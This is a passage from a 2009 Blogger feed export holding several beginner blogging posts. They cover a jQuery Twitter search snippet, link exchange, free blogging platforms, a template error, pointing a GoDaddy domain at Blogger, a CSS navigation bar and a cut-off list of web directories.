153);"&gt;(&lt;/span&gt;function&lt;span style="color: rgb(0, 0, 153);"&gt;() {&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;twitterq &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; $&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'#twitterq'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.attr&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'value'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;$.ajax&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;({&lt;/span&gt;&lt;div style="margin-left: 14px;"&gt;type&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;"POST"&lt;/span&gt;,&lt;br /&gt;url&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;"search.php"&lt;/span&gt;,&lt;br /&gt;cache&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;false&lt;/span&gt;,&lt;br /&gt;data&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;"twitterq="+&lt;/span&gt; twitterq,&lt;br /&gt;success&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt; &lt;span style="font-weight: bold; color: rgb(0, 0, 0);"&gt;function&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;html&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;){&lt;/span&gt;&lt;br /&gt;$&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"#twitter-results"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.html&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;html&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;displayTweet&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;();&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;           }&lt;/span&gt;&lt;/div&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;       });&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;return false;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;});&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;});&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;This is a very basic implementation you can modify to get a real-time stream of messages for example calling a new ajax request (to search.php) every time the current array with the search results is totally displayed in the page.&lt;br /&gt;&lt;br /&gt;That's all. If you have some suggestion please add a comment. Thanks!&lt;br /&gt;You can &lt;a href="http://www.box.net/shared/vpjkvo4oe1"&gt;download the full code of this tutorial here&lt;/a&gt; and reuse it on your projects.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.box.net/shared/vpjkvo4oe1"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/Sg_-cg8AxKI/AAAAAAAAEEA/xKmP9-LvnEQ/download.png" align="absmiddle" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h5&gt;Related posts&lt;/h5&gt;- &lt;a href="http://woork.blogspot.com/2009/06/simple-php-twitter-search-ready-to-use.html"&gt;Simple PHP Twitter Search ready to use in your web projects&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://woork.blogspot.com/2009/06/super-simple-way-to-work-with-twitter.html"&gt;Super simple way to work with Twitter API (PHP + CSS)&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://woork.blogspot.com/2007/10/twitter-send-message-from-php-page.html"&gt;Send messages from a PHP page using Twitter API&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-7557802152456107923?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/7557802152456107923/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=7557802152456107923' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7557802152456107923'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7557802152456107923'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/twitter-api-how-to-create-stream-of.html' title='Twitter API: How to create a stream of messages Monitter-like with PHP and jQuery'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh3.ggpht.com/_TqPdHmAEwTM/Slm_l9eKfxI/AAAAAAAAFVo/FzPykgQs5YA/s72-c/stream3.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-1457407591677292018</id><published>2009-07-28T00:46:00.003-07:00</published><updated>2009-07-28T00:46:01.449-07:00</updated><title type='text'>Link Exchange</title><content type='html'>Hi, you all must be knowing the importance of backlinks and its impact on your blog's traffic. Here I start the link exchange programme for this blog.&lt;br /&gt;&lt;br /&gt;If you want to display your link here, just place link to my blog and comment here with your blog rul, I'll check whether my link is place or not, and if placed , will immediately place your link here.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://tech-hutblog.blogspot.com/" target="_blank"&gt;Tech Hut&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.4all2all.net/" target="_blank"&gt;for ALL to ALL&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://quotes-book.blogspot.com/"&gt;Quotes-Book&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://ourezone.blogspot.com/"&gt;Entertainment Zone&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.onlyfreestuffhereblogs.blogspot.com/"&gt;Blog Giveaways&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://nurazri.com/"&gt;Nurazri&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://makemoneybloggingconcepts.blogspot.com/"&gt;Make Money Blogging &lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://tech-feast.blogspot.com/"&gt;TechFeast&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-1457407591677292018?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/1457407591677292018/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=1457407591677292018' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1457407591677292018'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1457407591677292018'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/link-exchange.html' title='Link Exchange'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-3839067422691182978</id><published>2009-07-28T00:46:00.001-07:00</published><updated>2009-07-28T00:46:00.375-07:00</updated><title type='text'>The complete list Free Blogging Platforms.</title><content type='html'>Now-a-days,blogging has been sought a great source of earning some good online income.But still many people wonder from where to start.So,here I am providing the complete list of free blogging platform available over the internet -&lt;br /&gt;&lt;ol&gt;&lt;li&gt;     Aeonity.com&lt;/li&gt;&lt;li&gt;     blog.com&lt;/li&gt;&lt;li&gt;     blogates.com&lt;/li&gt;&lt;li&gt;     blogetery.com&lt;/li&gt;&lt;li&gt;     blogger.com&lt;/li&gt;&lt;li&gt;     blogr.com&lt;/li&gt;&lt;li&gt;     blogsome.com&lt;/li&gt;&lt;li&gt;     blogster.com&lt;/li&gt;&lt;li&gt;     bravenet.com/webtools/journal/&lt;/li&gt;&lt;li&gt;     clearblogs.com&lt;/li&gt;&lt;li&gt;     ehow.com&lt;/li&gt;&lt;li&gt;     googlepages.com&lt;/li&gt;&lt;li&gt;     hubpages.com&lt;/li&gt;&lt;li&gt;     iseekblog.com&lt;/li&gt;&lt;li&gt;     myspace.com&lt;/li&gt;&lt;li&gt;     pbwiki.com&lt;/li&gt;&lt;li&gt;     quazen.com&lt;/li&gt;&lt;li&gt;     rticlz.com&lt;/li&gt;&lt;li&gt;     sampa.com&lt;/li&gt;&lt;li&gt;     squarespace.com&lt;/li&gt;&lt;li&gt;     squidoo.com&lt;/li&gt;&lt;li&gt;     stikipad.com&lt;/li&gt;&lt;li&gt;     thoughts.com&lt;/li&gt;&lt;li&gt;     tumblr.com&lt;/li&gt;&lt;li&gt;     wikispaces.com&lt;/li&gt;&lt;li&gt;     wordpress.com&lt;/li&gt;&lt;/ol&gt;As per the &lt;a href="http://www.pcworld.com/article/id,128620-page,1/article.html"&gt;PCWorld.com&lt;/a&gt;,top 5 among the are -&lt;br /&gt;&lt;ol style="list-style-type: decimal;"&gt;&lt;li&gt;Blogger.com&lt;/li&gt;&lt;li&gt;Wordpress.com&lt;/li&gt;&lt;li&gt;Typepad.com&lt;/li&gt;&lt;li&gt;Tripod.com&lt;/li&gt;&lt;li&gt;Squarespace.com&lt;/li&gt;&lt;/ol&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-3839067422691182978?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/3839067422691182978/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=3839067422691182978' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3839067422691182978'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3839067422691182978'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/complete-list-free-blogging-platforms.html' title='The complete list Free Blogging Platforms.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-6611662113576557024</id><published>2009-07-28T00:45:00.021-07:00</published><updated>2009-07-28T00:45:59.455-07:00</updated><title type='text'>Got Error while uploading Template - bX-2nuf8g</title><content type='html'>After making the first post here,I thought of changing the Blogger template.I never liked the default templates provided here at Blogger.After finding a suitable template (after 2 hrs. of search), I just tried to upload it to my blog , but I got this error message from Blogger - bX-2nuf8g. I tried one more time but same message.I retried for 5 times more,but in vain.&lt;br /&gt;&lt;br /&gt;Then I just checked my other blog by uploading the template there, doubting if there is any problem in that specific blog, but still the same error message - bX-2nuf8g.&lt;br /&gt;&lt;br /&gt;Then I searched blogger help for this error message.There I got to know that this message ( and every message starting with "bx-" have no specific meaning.They adviced to delete your cookies and cache and retry. But this also didn't help ,then I used 2nd option available there - Report your Error Message to Blogger.&lt;br /&gt;&lt;br /&gt;here's the link for that -&lt;br /&gt;http://groups.google.com/group/blogger-help/web/report-your-bx-code-bug-here&lt;br /&gt;&lt;br /&gt;Well let's see what Blogger can help me with.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;UPDATE:&lt;br /&gt;&lt;/span&gt;Solution - Just change your browser,I tried with Apple Safari and got my work done.&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-6611662113576557024?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/6611662113576557024/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=6611662113576557024' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6611662113576557024'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6611662113576557024'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/got-error-while-uploading-template-bx.html' title='Got Error while uploading Template - bX-2nuf8g'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-4122876742133064104</id><published>2009-07-28T00:45:00.019-07:00</published><updated>2009-07-28T00:45:58.601-07:00</updated><title type='text'>At last added a Custom Domain from GoDaddy.com to Blogger!!!</title><content type='html'>As I am blogging since last 1 year I know the importance of having your own domain.&lt;br /&gt;&lt;br /&gt;I changed to custom domain on the 2nd day of starting the blog at Blogger,because if I've done that later,it would have resulted in a great drop in my traffic and low rankings on the search engine result pages.&lt;br /&gt;&lt;br /&gt;I choose Godaddy.com for registering a domain,because it's cheapest,  safe, and has partenered with Blogger for providing custom domains.But it costs $10/domain per year if you purchased it through Blogger.Thats why I purchased it directly from GoDaddy.com using some promo coupons and got the domain registered for 5 years for $35.75 only.&lt;br /&gt;&lt;br /&gt;So you have registered a domain with GoDaddy.com, next -&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Login to your account at GoDaddy.com .&lt;/li&gt;&lt;li&gt;Click on "Manage Domains".&lt;/li&gt;&lt;li&gt;Click on your domain where you want to host your Blogger blog.&lt;/li&gt;&lt;li&gt;There will be one option availabe - "&lt;span id="fullpost"&gt;Total DNS Control And MX Records".(Note- You will not get this option unless you click on your domain.)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="fullpost"&gt;There will be a record prefixed - "www",in front of it there will be edit option(image of a pencil), click it.&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="fullpost"&gt;In the option "Point to Host" - enter this - "ghs.google.com".Please DO NOT change anything. Click ok.&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="fullpost"&gt;That's it you have added google's server to your domain.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="fullpost"&gt;Now if you want to can check whether everything is fine or not,open Command Prompt(Start&gt;Run&gt;Command).&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="fullpost"&gt;Type - "ping www.yourdomain.com" and press enter.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="fullpost"&gt;If everything is ok you will a response like this -&lt;blockquote&gt;Pinging ghs.1.google.com [72.14.207.121] with 32 bytes of data: Reply from 72.14.207.121: bytes=32 time=85ms TTL=247 Reply from 72.14.207.121: bytes=32 time=89ms TTL=247 Reply from 72.14.207.121: bytes=32 time=86ms TTL=247 Reply from 72.14.207.121: bytes=32 time=86ms TTL=247 Ping statistics for 72.14.207.121: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 85ms, Maximum = 89ms, Average = 86ms&lt;/blockquote&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="fullpost"&gt;Now everything is done add your custom domain to your Blogger blog.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;This way I got my blog address changed from "the-webmasters-blog.blogspot.com" to "webmasters-blog.com".(I must rather say "www.webmasters-blog.com",because Blogger can add either "www.webmasters-blog.com" or "webmasters-blog.com" to my blog,and I preferred first.)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Update:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;I was completely unaware that with Godaddy domain I've got a Free Godaddy Hosting Account,hence I added it to Blogger.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;But now I've decided to Host another Wordpress Blog at the Godaddy Domain - www.webmasters-blog.com  and also have one Blogger blog =&gt; free-blogger-help.blogspot.com&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-4122876742133064104?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/4122876742133064104/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=4122876742133064104' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4122876742133064104'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4122876742133064104'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/at-last-added-custom-domain-from.html' title='At last added a Custom Domain from GoDaddy.com to Blogger!!!'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-6428579508801828988</id><published>2009-07-28T00:45:00.017-07:00</published><updated>2009-07-28T00:45:57.424-07:00</updated><title type='text'>How to add a horizontal navigation bar or menu to Blogger?</title><content type='html'>We have seen a horizontal menu or a navigation bar on many websites and blogs especially the wordpress blogs.But very few Blogger blogs have a horizontal navigation bar like we have here at our blog.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_tbHfaj1A058/SHefh771DAI/AAAAAAAAD74/Co1enyusvj8/s1600-h/menu.JPG"&gt;&lt;img style="cursor: pointer;" src="http://bp1.blogger.com/_tbHfaj1A058/SHefh771DAI/AAAAAAAAD74/Co1enyusvj8/s400/menu.JPG" alt="" id="BLOGGER_PHOTO_ID_5221817698332511234" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Here are some simple steps for setting up a Horizontal Navigation Bar -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 1.-&lt;/span&gt;Dashboard &gt; Layout &gt; Edit HTML. Here find this -  &lt;span style="font-style: italic;"&gt;/* Header */&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;Step 2.- &lt;/span&gt;Add this code below that -&lt;br /&gt;&lt;blockquote&gt;#menu ul li{&lt;br /&gt;font-size:100%;&lt;br /&gt;list-style-type: none;&lt;br /&gt;display:inline;&lt;br /&gt;padding:0px;&lt;br /&gt;margin:10px;&lt;br /&gt;border:0px solid;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#menu li a{&lt;br /&gt;color:#dfffed;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#menu li a:visited {&lt;br /&gt;color: #57E964;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#menu li a:hover {&lt;br /&gt;color: #F88017;&lt;br /&gt;background: #ffff66;&lt;br /&gt;}&lt;/blockquote&gt;You should edit this code after step 6,so that you could know how does it looks like.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;(Edit margin values for placement,and various html color values below for respective colours.)&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 3.- &lt;/span&gt;Find this -&lt;blockquote&gt;b:section class='header' id='header' &lt;span style="color: rgb(0, 153, 0);"&gt;maxwidgets='1'&lt;/span&gt; &lt;span style="color: rgb(255, 0, 0);"&gt;showaddelement='no'&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 4.- &lt;/span&gt;Change -&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;showaddelement='&lt;/span&gt;no&lt;span style="color: rgb(0, 0, 0);"&gt;'&lt;/span&gt;&lt;/span&gt;  to showaddelement='&lt;span style="color: rgb(204, 0, 0);"&gt;yes&lt;/span&gt;'&lt;/li&gt;&lt;li&gt;            maxwidgets='&lt;span style="color: rgb(0, 153, 0);"&gt;1&lt;/span&gt;' to maxwidgets='&lt;span style="color: rgb(0, 153, 0);"&gt;4&lt;/span&gt;'&lt;/li&gt;&lt;/ol&gt;Save template and go to Page Elements.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 5.-&lt;/span&gt; In the Header , Add Page Element &gt; Add HTML .&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 6.-&lt;/span&gt; Leave the title &lt;span style="font-weight: bold;"&gt;Blank &lt;/span&gt;and&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;add the following code in text field -&lt;br /&gt;&lt;blockquote&gt;&amp;lt;div id='menu'&amp;gt;&lt;br /&gt;&amp;lt;ul&amp;gt;&lt;br /&gt;&amp;lt;li&amp;gt;&amp;lt;a href="&lt;span style="color: rgb(255, 0, 0);"&gt;Your URL&lt;/span&gt;"&amp;gt;Home&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;&amp;lt;li&amp;gt;&amp;lt;a href="&lt;span style="color: rgb(255, 0, 0);"&gt;Your URL&lt;/span&gt;"&amp;gt;Advertise&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;&amp;lt;li&amp;gt;&amp;lt;a href="&lt;span style="color: rgb(255, 0, 0);"&gt;Your URL&lt;/span&gt;"&amp;gt;About Me&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;&amp;lt;li&amp;gt;&amp;lt;a href="mailto:&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;YOUR EMAIL ADDRESS&lt;/span&gt;"&amp;gt;Contact&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;&lt;/blockquote&gt;Add your desired values in above code marked red. Save it.&lt;br /&gt;&lt;br /&gt;Now you can edit the code in&lt;span style="font-weight: bold;"&gt; Step 2.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-6428579508801828988?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/6428579508801828988/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=6428579508801828988' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6428579508801828988'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6428579508801828988'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-horizontal-navigation-bar-or.html' title='How to add a horizontal navigation bar or menu to Blogger?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_tbHfaj1A058/SHefh771DAI/AAAAAAAAD74/Co1enyusvj8/s72-c/menu.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-230766206298508657</id><published>2009-07-28T00:45:00.015-07:00</published><updated>2009-07-28T00:45:56.362-07:00</updated><title type='text'>Submit your blog to High PageRank Directories.</title><content type='html'>As many of you know that submitting your blogs to different directories will help you in increasing traffic.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;How does it help ?&lt;/span&gt;&lt;br /&gt;- By submitting your blog to directories and getting listed there will increase exposure of your blog to Search Engines. Also it increases your PageRank which determines your Search Engine Result Position (SERP),thus getting you more traffic.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Where to Submit your Blogs ?&lt;br /&gt;&lt;/span&gt;- Here is the complete list of oneway directories with high Pagerank.&lt;br /&gt;&lt;ol style="list-style-type: decimal;"&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;dmoz.org - PR9&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;2rss.com - PR7&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;kids.yahoo.com/submissions/suggest_site - PR7&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;ExactSeek.com - PR7&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Jayde.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;SuperPages.ca - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Patient.co.uk - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;BestCatalog.net - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Gimpsy.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Bizweb.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Haaba.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Canadopedia.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Web-Beacon.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;ClearLeadInc.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;aigam.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;BooksMusicVideo.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Chiff.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;WebWorldIndex.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;IllumiRate.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Americasbest.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;SoMuch.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Re-Quest.net - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;PsychNet-UK.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Clickey.com - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;ProudlyCanadian.net - PR6&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;turnpike.net/directory.html - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Earthstation9.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Re-quest.net - 